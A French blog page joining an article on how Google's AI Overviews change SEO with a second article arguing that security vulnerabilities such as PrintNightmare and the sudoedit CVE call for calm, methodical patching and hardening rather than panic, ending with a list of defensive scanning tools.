Imagine que tu poses une question à Google : “Comment économiser de la batterie sur mon Android ?”
Avant, tu avais dix liens, quelques pubs, parfois un encadré.
Maintenant, Google te résume la réponse directement. Avec un paragraphe écrit par son IA. Puis, en dessous (si tu scrolles), les sources.

Ces “AI Overviews” sont comme une Google réponse turbo, générée par une IA qui s’appuie sur des sources… mais sans toujours les montrer directement. Une sorte de Siri + Wikipédia + ChatGPT dans le moteur.

2. Est-ce la fin du SEO ?

Non, mais ce n’est plus le même jeu.

Avant : tu optimisais pour être dans le top 3.
Maintenant : tu optimises pour être cité par l’IA.
Pas la même logique, pas les mêmes critères. Le clic devient rare, la visibilité floue. Même si ton contenu est utilisé, rien ne garantit que l’utilisateur vienne sur ton site.

3. Ce que Google dit (officiellement)

Lors du Google I/O, Liz Reid (VP Search) a donné quelques conseils pour être “AI-compatible” :

  • Crée du contenu utile et précis.
  • Sois transparent sur la source, l’expertise, les auteurs.
  • Structure bien ton texte (titres clairs, paragraphes logiques).
  • Réponds à des questions concrètes, sans tourner autour du pot.

Mais rien de révolutionnaire. Ce sont les mêmes recommandations que pour le SEO “classique”. Sauf que maintenant, l’IA trie à ta place.

4. Ce que Google ne dit pas, mais qui compte

Voici ce que l’expérience terrain nous apprend :

  • Les sources citées sont parfois surprenantes : petits blogs, forums, voire Reddit.
  • Les contenus trop marketés sont écartés.
  • Les contenus très “humains” (expériences, opinions claires) ressortent bien.
  • Les balises structurées (FAQ, HowTo) semblent utiles pour guider l’IA.

Donc, si tu veux encore exister dans ce nouveau paysage, écris comme un humain, mais pense comme une IA.

5. Stratégie “Christophe” : que faire concrètement ?

Voici ton plan d’action tactique :

  • Double down sur la qualité : plus que jamais, il faut être le contenu que Google voudra citer.
  • Optimise pour la réponse directe : chaque article devrait répondre à une question précise, dès l’intro.
  • Utilise des données structurées : balises FAQ, HowTo, Article, tout ce qui aide l’IA à comprendre ton contenu.
  • Ajoute une touche personnelle : raconte, explique, interprète. Les IA aiment les contenus différenciés.
  • Surveille si tu es cité : ce n’est pas simple, mais des outils comme Semrush, Sistrix ou Ahrefs commencent à intégrer des suivis de visibilité dans l’IA.

6. Faut-il paniquer ?

Non. Mais il faut s’adapter.
Comme à chaque évolution du moteur.
Ce n’est pas la première disruption du SEO (souviens-toi de Panda, Penguin, BERT…).
Mais celle-ci est plus radicale : l’IA devient l’interface.

En clair : ton vrai visiteur, c’est l’IA de Google.
À toi de la séduire sans perdre l’humain de vue.

Administration, Debian GNU/Linux, Sécurité, Windows

Faut-il paniquer face aux failles de sécurité ?

Faut-il vraiment paniquer face aux failles de sécurité ? 

Faut-il vraiment paniquer face aux failles de sécurité

Faut-il vraiment paniquer face aux failles de sécurité ? Réalité, exemples concrets, et bon sens

Faut-il vraiment paniquer face aux failles de sécurité ? Entre réalité, marketing et bon sens

Chaque semaine, une nouvelle alerte sécurité débarque. CVE critique par-ci, 0-day par-là. Sur Windows comme sur Linux, le mot « faille » déclenche immédiatement une chasse aux patchs, des nuits blanches en entreprise… et parfois des achats précipités de solutions de sécurité.

Mais faut-il vraiment s’affoler ? Est-on en danger immédiat ou juste en train d’alimenter un écosystème qui capitalise sur la peur ?

C’est quoi, une faille de sécurité ?

Une faille de sécurité, ou vulnérabilité, est une faiblesse dans un système, un logiciel ou un protocole qui peut permettre à un acteur malveillant de compromettre :

  • La confidentialité (accès à des données)
  • L’intégrité (modification non autorisée)
  • La disponibilité (mise hors service d’un système)

Mais attention :

❗ Une faille n’est pas automatiquement exploitable.
Il faut que plusieurs conditions soient réunies :

  • La version vulnérable doit être présente
  • Elle doit être accessible à l’attaquant
  • Il doit exister un code d’exploitation (exploit)
  • L’attaquant doit pouvoir agir avant que la faille ne soit corrigée

Cas concrets : Windows vs Linux

Exemple 1 — Windows : Faille PrintNightmare (CVE-2021-34527)

Microsoft a alerté en 2021 sur une faille critique du spouleur d’impression qui permettait à un utilisateur distant d’exécuter du code à distance.

🔹 Réalité :

  • Exploitable uniquement si le service était activé
  • Sur de nombreuses machines, le spouleur n’est actif que sur les postes utilisateurs, pas les serveurs critiques
  • Patch publié rapidement, mais des POC ont circulé très vite sur GitHub

🔹 Analyse :
Si tu désactives ce service sur tes machines non imprimantes, le risque est nul.

Exemple 2 — Linux : Sudoedit (CVE-2023-22809)

Cette faille permettait à un utilisateur local malveillant d’obtenir des privilèges root via la commande sudoedit, en manipulant des liens symboliques.

🔹 Réalité :

  • Exploitable localement uniquement
  • Nécessite un accès au compte utilisateur
  • Corrigé dans les versions récentes de sudo

🔹 Analyse :
Un serveur bien configuré avec un accès SSH restreint et des utilisateurs non privilégiés n’était pas réellement à risque.

La cybersécurité, un business de la peur ?

La peur vend.

Derrière chaque vulnérabilité médiatisée :

  • Un éditeur de solutions de sécurité qui propose de “réduire votre surface d’attaque”
  • Un rapport qui « prouve » que 97% des entreprises sont vulnérables
  • Un service managé qui vous promet une tranquillité absolue contre un abonnement mensuel

Exemple : L’effet buzz des CVE

Certains chercheurs publient des CVE sur des outils obscurs ou peu utilisés, uniquement pour :

  • Booster leur visibilité
  • Pousser leur scanner de sécurité maison
  • Générer des backlinks vers leur blog

Faille ≠ alarme rouge immédiate

La majorité des vraies intrusions ne passent pas par des failles logicielles complexes, mais par :

  • 🟠 Des mots de passe faibles (admin/admin, 123456)
  • 🟠 Du phishing avec pièce jointe piégée
  • 🟠 Des erreurs de configuration (rsync ouvert en écriture publique…)
  • 🟠 Des services laissés accessibles sans authentification

Ce n’est pas la complexité du vecteur qui réussit l’attaque, c’est sa simplicité.

Bonnes pratiques : la sécurité raisonnée

Voici ce qu’un admin système (Linux ou Windows) devrait faire au lieu de paniquer à chaque alerte CVE :

Action Pourquoi c’est utile
🔄 Mettre à jour régulièrement Corrige automatiquement les failles connues
🚫 Désactiver les services inutiles Moins de surface d’attaque (ex: smb ou rpcbind)
🔐 Mettre en place un MFA (authentification à deux facteurs) Protège même si un mot de passe fuit
🧱 Séparer les réseaux internes et publics Évite que toute une infra tombe via une seule faille
👨‍🏫 Former les utilisateurs au phishing Réduit les compromissions par négligence humaine

Linux et Windows : même combat, autres méthodes

OS Risques typiques Défenses
Windows Phishing, macros Office, RDP mal sécurisé GPO, Defender, isolation des sessions
Linux Failles de daemons exposés, sudo mal configuré Firewalld/iptables, AppArmor/SELinux, auditd

Aucune plateforme n’est invulnérable. Mais sur les deux, la bonne hygiène système et la réduction du périmètre exposé restent les meilleures armes.

Et les outils automatiques dans tout ça ?

Certains scripts ou outils promettent de scanner toutes les CVE d’un système (ex : lynis, clamav, vulners, ou même Windows Security Scanner).
Ils peuvent aider, mais ne doivent pas dicter la panique. Beaucoup d’alertes sont inutiles, ou nécessitent un contexte très spécifique.

Un bon professionnel filtre, priorise, et agit avec méthode. Pas avec fébrilité.

Conclusion : lucidité, pas paranoïa

Le monde ne va pas s’effondrer à chaque CVE critique.
La cybersécurité efficace ne se base ni sur la peur, ni sur la communication anxiogène. Elle repose sur des :

  • Décisions techniques raisonnables
  • Procédures bien établies
  • Capacités à répondre, pas à réagir en panique

Rester calme face aux vulnérabilités, c’est être pro.
Et c’est ce qui sépare un technicien d’un pompier numérique débordé. Donc, Faut-il paniquer face aux failles de sécurité ? La réponse est NON ! Pas toujours.

Tu veux aller plus loin ?

💡 Quelques outils recommandés pour évaluer calmement ton exposition :

  • trivy (Linux/Docker) : analyse de vulnérabilités dans les containers
  • OpenVAS / Greenbone : scanner réseau open source
  • Windows Security Baseline : recommandations Microsoft pour renforcer les postes
  • osquery : interrogez vos systèmes comme une base de données